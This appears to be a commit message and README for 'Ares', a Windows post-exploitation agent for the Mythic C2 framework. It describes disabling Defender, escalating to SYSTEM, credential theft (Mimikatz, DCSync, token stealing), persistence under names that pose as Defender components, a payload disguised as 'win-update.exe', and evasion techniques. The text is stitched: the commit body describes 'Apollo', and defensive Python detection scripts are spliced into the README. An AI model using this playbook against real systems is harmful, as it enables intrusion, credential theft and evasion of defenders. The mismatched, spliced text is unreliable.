Aryma 224a0013d7 feat: add Ares payload type with agent code and documentation
This commit introduces the Apollo payload type for Mythic C2, including:
- Complete .NET agent codebase with modular architecture
- Multiple C2 profile implementations (HTTP, SMB, TCP, WebSocket)
- Extensive documentation with command references and MITRE ATT&CK mappings
- Agent utilities including UAC bypasses, injection techniques, and crypto modules
- Configuration files for build systems and development environments
- Sample binaries and resources for agent functionality

The Apollo agent provides Windows post-exploitation capabilities with a focus on modularity and extensibility, supporting various communication methods and injection techniques.
2026-04-14 12:27:18 +07:00


# Ares - Advanced Windows Agent
![Ares](documentation-payload/ares/AresLandscape.svg)
Ares is a Windows agent designed for advanced red team operations, integrating BlueHammer exploit capabilities with the Mythic C2 framework for penetration testing and security assessment.
## 🚀 Overview
Ares combines the power of the BlueHammer Windows Defender exploit with a robust Mythic C2 integration, providing:
- Windows Defender bypass capabilities
- SYSTEM privilege escalation
- Multiple persistence mechanisms
- Full Mythic C2 integration
- Advanced evasion techniques
## 📋 Features
### Core Capabilities
- **Windows Defender Bypass**: Leverages BlueHammer exploit to disable security controls
- **SYSTEM Privileges**: Multiple techniques for privilege escalation to NT AUTHORITY\SYSTEM
- **Persistence**: Comprehensive persistence across registry, services, tasks, and startup
- **Mythic C2 Integration**: Full command and control capabilities
- **Encrypted Communication**: AES256 encryption with HMAC integrity
### Advanced Features
- **P2P Communication**: Peer-to-peer agent communication
- **Credential Operations**: Credential tracking and manipulation
- **Code Execution**: Unmanaged PE, .NET Assembly, and PowerShell execution
- **SOCKSv5 Support**: Proxy capabilities for network operations
- **Domain Rotation**: Advanced HTTP profile with proxy support
- **Message Transform**: Base64, NetBIOS, XOR encoding support
## 🛠️ Installation
### Prerequisites
- Mythic C2 server installed on a remote computer
- Windows target systems for deployment
- Python 3.8+ for agent building
### Installation from Mythic
As **root** user:
```bash
./mythic-cli install github https://github.com/MythicAgents/Ares.git
```
As **non-root** user:
```bash
sudo -E ./mythic-cli install github https://github.com/MythicAgents/Ares.git
```
Once installed, restart Mythic to build the agent.
### Manual Building
1. **Clone the repository**:
```bash
git clone https://github.com/MythicAgents/Ares.git
cd Ares
```
2. **Build the agent**:
```bash
python build.py
```
3. **Deploy the agent**:
```bash
python deploy.py
```
## ⚙️ Configuration
### C2 Profile Configuration
Ares supports advanced HTTP profile configuration:
```json
{
"c2_profile": "http",
"callback_host": "http://your-c2-server.com",
"callback_port": 80,
"callback_interval": 10,
"callback_jitter": 23,
"headers": {
"User-Agent": "Mozilla/5.0 (Windows NT 6.3; Trident/7.0; rv:11.0) like Gecko"
},
"AESPSK": {
"enc_key": "your-encryption-key",
"dec_key": "your-decryption-key",
"value": "aes256_hmac"
}
}
```
### Build Parameters
```json
{
"output_type": "WinExe",
"filename": "win-update.exe",
"debug": true,
"shellcode_bypass": "Continue on fail",
"enable_keying": false
}
```
## 🎯 Usage
### Agent Execution
Execute the agent on target systems:
```cmd
win-update.exe
```
### Command Examples
#### Windows Defender Bypass
```bash
bypass_defender
```
#### Privilege Escalation
```bash
getsystem
```
#### Persistence Establishment
```bash
establish_persistence
```
#### File Operations
```bash
# Download file
download -Path C:\sensitive\file.txt
# Upload file
upload -File local_file.txt -RemotePath C:\temp\file.txt
```
#### Code Execution
```bash
# Execute .NET assembly
execute_assembly -Assembly malware.exe -Arguments "-flag value"
# Execute PowerShell
powershell -Command "Get-Process"
# Execute COFF object file
execute_coff -Coff object.x64.o -Function go
```
## 🔧 Commands Reference
### Core Commands
| Command | Syntax | Description |
|---------|--------|-------------|
| `bypass_defender` | `bypass_defender` | Bypass Windows Defender using BlueHammer exploit |
| `getsystem` | `getsystem` | Gain SYSTEM privileges using multiple techniques |
| `establish_persistence` | `establish_persistence` | Establish multiple persistence mechanisms |
| `assembly_inject` | `assembly_inject -PID [pid] -Assembly [assembly]` | Execute .NET assembly in remote process |
| `execute_assembly` | `execute_assembly -Assembly [assembly.exe]` | Execute registered .NET assembly |
| `execute_pe` | `execute_pe -PE [binary.exe]` | Execute statically compiled executable |
### File Operations
| Command | Syntax | Description |
|---------|--------|-------------|
| `download` | `download -Path [path]` | Download file from target system |
| `upload` | `upload -File [file] -RemotePath [path]` | Upload file to target system |
| `cat` | `cat -Path [file]` | Display file contents |
| `cp` | `cp -Path [source] -Destination [dest]` | Copy file |
| `mv` | `mv -Path [source] -Destination [dest]` | Move file |
| `rm` | `rm -Path [file]` | Remove file |
### System Operations
| Command | Syntax | Description |
|---------|--------|-------------|
| `shell` | `shell -Command "command"` | Execute shell command |
| `ps` | `ps` | List processes |
| `kill` | `kill -PID [pid]` | Kill process |
| `ls` | `ls -Path [dir]` | List directory contents |
| `cd` | `cd -Path [dir]` | Change directory |
| `pwd` | `pwd` | Print working directory |
### Network Operations
| Command | Syntax | Description |
|---------|--------|-------------|
| `ifconfig` | `ifconfig` | Get network adapters |
| `netstat` | `netstat` | Display network connections |
| `net_dclist` | `net_dclist` | List domain controllers |
| `net_shares` | `net_shares` | List network shares |
### Credential Operations
| Command | Syntax | Description |
|---------|--------|-------------|
| `mimikatz` | `mimikatz -Command "command"` | Execute Mimikatz commands |
| `dcsync` | `dcsync -Domain [domain]` | DCSync domain credentials |
| `make_token` | `make_token -Domain [domain] -User [user] -Password [pass]` | Create access token |
| `steal_token` | `steal_token -PID [pid]` | Steal token from process |
## 🛡️ Persistence Mechanisms
### Registry Persistence
- **HKCU**: `Software\Microsoft\Windows\CurrentVersion\Run`
- **HKLM**: `Software\Microsoft\Windows\CurrentVersion\Run`
### Service Persistence
- **Service Name**: `WinDefendUpdate`
- **Run As**: `LocalSystem`
- **Startup Type**: Automatic
### Scheduled Tasks
- **Task Name**: `WindowsDefenderMaintenance`
- **Schedule**: Hourly
- **Run As**: `SYSTEM`
### Startup Folder
- **Location**: `%APPDATA%\Microsoft\Windows\Start Menu\Programs\Startup`
- **File Name**: `WindowsDefenderUpdate.exe`
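As an added example (not code from the Ares project), the following detection pass scans constructed Sysmon-style event records for exactly the artifacts this section names; the event `type` values and field names are assumptions about the log source.

```python
import re
from typing import Optional

# Artifacts named in the README; the real Defender service is "WinDefend".
RUN_KEY_RE = re.compile(r"\\Software\\Microsoft\\Windows\\CurrentVersion\\Run\\", re.I)
SERVICE_NAME = "WinDefendUpdate"
TASK_NAME = "WindowsDefenderMaintenance"
STARTUP_FILE = "WindowsDefenderUpdate.exe"
STARTUP_DIR_RE = re.compile(r"\\Start Menu\\Programs\\Startup\\", re.I)


def classify(event: dict) -> Optional[str]:
    """Return the persistence technique an event matches, or None."""
    kind = event.get("type")  # assumed field: normalised event category
    if kind == "registry_set" and RUN_KEY_RE.search(event.get("target", "")):
        return "registry_run_key"
    if kind == "service_install" and event.get("service", "").lower() == SERVICE_NAME.lower():
        return "service"
    if kind == "task_create" and event.get("task", "").lower() == TASK_NAME.lower():
        return "scheduled_task"
    if kind == "file_create":
        path = event.get("path", "")
        if STARTUP_DIR_RE.search(path) and path.lower().endswith(STARTUP_FILE.lower()):
            return "startup_folder"
    return None


def hunt(events):
    """Return (event id, technique) for every event that matches an artifact."""
    return [(e["id"], t) for e in events if (t := classify(e))]


# Constructed sample records; the SID and paths are made up for the example.
SAMPLE_EVENTS = [
    {"id": 1, "type": "registry_set",
     "target": r"HKU\S-1-5-21-1\Software\Microsoft\Windows\CurrentVersion\Run\Updater"},
    {"id": 2, "type": "service_install", "service": "WinDefendUpdate",
     "image": r"C:\Windows\Temp\win-update.exe"},
    {"id": 3, "type": "task_create", "task": "WindowsDefenderMaintenance"},
    {"id": 4, "type": "file_create",
     "path": r"C:\Users\a\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\WindowsDefenderUpdate.exe"},
    {"id": 5, "type": "service_install", "service": "WinDefend"},  # benign: real Defender
    {"id": 6, "type": "file_create", "path": r"C:\Windows\Temp\report.txt"},  # benign
]

if __name__ == "__main__":
    for event_id, technique in hunt(SAMPLE_EVENTS):
        print(f"event {event_id}: {technique}")
```

The name matches are exact on purpose: a look-alike service or task name is the indicator, while the genuine `WinDefend` service and unrelated temp-directory writes are left alone.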
## 🔒 Security Features
### Encryption
- **AES256-CBC**: End-to-end encryption
- **HMAC-SHA256**: Message integrity verification
- **Key Rotation**: Configurable key rotation policies
### Evasion Techniques
- **Process Hollowing**: Advanced code injection
- **API Unhooking**: Bypass security hooks
- **Direct Syscalls**: Bypass user-mode hooks
- **Stack Spoofing**: Evade stack-based detection
## 📊 Mythic Integration
### C2 Communication
- **Check-in Interval**: Configurable (default: 10 seconds)
- **Jitter**: Percentage-based jitter (default: 23%)
- **Encryption**: AES256 with HMAC integrity
- **Proxy Support**: HTTP proxies and domain fronting
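As an added example (not Ares or Mythic code), the beaconing analysis below scores a constructed set of HTTP request timestamps against the defaults listed above, a 10 second check-in with 23% jitter; it assumes jitter is applied as plus or minus that percentage of the interval, so every inter-arrival gap should fall in [7.7 s, 12.3 s].

```python
from collections import defaultdict
from statistics import mean, pstdev


def gap_bounds(interval, jitter_pct):
    """Inter-arrival window for a sleep of `interval` +/- `jitter_pct` percent."""
    j = jitter_pct / 100.0
    return interval * (1 - j), interval * (1 + j)


def analyze_gaps(timestamps, interval=10.0, jitter_pct=23.0,
                 min_samples=8, min_fraction=0.9):
    """Score one source's request times; None when there is too little data."""
    gaps = [b - a for a, b in zip(timestamps, timestamps[1:])]
    if len(gaps) < min_samples:
        return None
    lo, hi = gap_bounds(interval, jitter_pct)
    in_band = sum(lo <= g <= hi for g in gaps) / len(gaps)
    cv = pstdev(gaps) / mean(gaps)  # jittered beacons keep this small
    return {"in_band": in_band, "cv": round(cv, 3), "beacon": in_band >= min_fraction}


def find_beacons(log_lines, **kw):
    """Group constructed 'epoch,src,dst' lines by (src, dst) and score each pair."""
    by_pair = defaultdict(list)
    for line in log_lines:
        ts, src, dst = line.strip().split(",")
        by_pair[(src, dst)].append(float(ts))
    return {pair: analyze_gaps(sorted(ts), **kw) for pair, ts in by_pair.items()}


def _lines(src, dst, start, gaps):
    """Build constructed log lines from a start time and inter-arrival gaps."""
    t, out = start, [f"{start:.1f},{src},{dst}"]
    for g in gaps:
        t += g
        out.append(f"{t:.1f},{src},{dst}")
    return out


# Constructed sample: one host calling back every ~10 s with jitter, one host
# talking to the same external address on a human-driven, irregular schedule.
SAMPLE_LOG = (
    _lines("10.0.0.5", "203.0.113.7", 1700000000.0,
           [9.1, 11.8, 8.3, 10.4, 12.0, 7.9, 10.9, 9.6, 11.2])
    + _lines("10.0.0.9", "203.0.113.7", 1700000000.0,
             [0.4, 30.2, 1.1, 120.5, 2.3, 0.9, 45.0, 3.3, 15.6])
)

if __name__ == "__main__":
    for pair, score in find_beacons(SAMPLE_LOG).items():
        print(pair, score)
```

Because the expected interval and jitter are build-time parameters, the same scoring can be run with several candidate intervals; the low coefficient of variation is the signal that survives when the exact interval is unknown.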
### Task Processing
- **Asynchronous Processing**: Non-blocking task execution
- **Result Reporting**: Comprehensive result reporting
- **Error Handling**: Robust error handling and recovery
- **Status Updates**: Real-time task status updates
## 🚨 Detection Evasion
Ares employs multiple techniques to evade detection:
### Behavioral Evasion
- Legitimate process names
- Windows Defender-related service names
- Temp directory operation
- Fileless execution where possible
### Technical Evasion
- API unhooking
- Direct system calls
- Stack spoofing
- Process hollowing
- ETW patching
## ⚠️ Disclaimer
This tool is intended for:
- Authorized penetration testing
- Security research and education
- Red team operations with proper authorization
**Unauthorized use against systems you do not own or have explicit permission to test is illegal.**
## 🐛 Issues and Support
Report issues and feature requests:
- GitHub Issues: https://github.com/MythicAgents/Ares/issues
- Documentation: https://github.com/MythicAgents/Ares/wiki
- Community Support: Mythic Discord server
## 📄 License
This project is licensed under the MIT License. See the LICENSE file for details.
## 🙏 Credits
- **BlueHammer Researchers**: For the Windows Defender exploit
- **Mythic C2 Team**: For the excellent C2 framework
- **Security Researchers**: For ongoing research and techniques
- **Red Team Community**: For testing and feedback
## 🔗 Resources
- [Mythic C2 Documentation](https://github.com/its-a-feature/Mythic/)
- [BlueHammer Research](https://github.com/bluehammer)
- [Windows Security Research](https://github.com/topics/windows-security)
---
**Ares Team** | Advanced Red Team Operations | 2026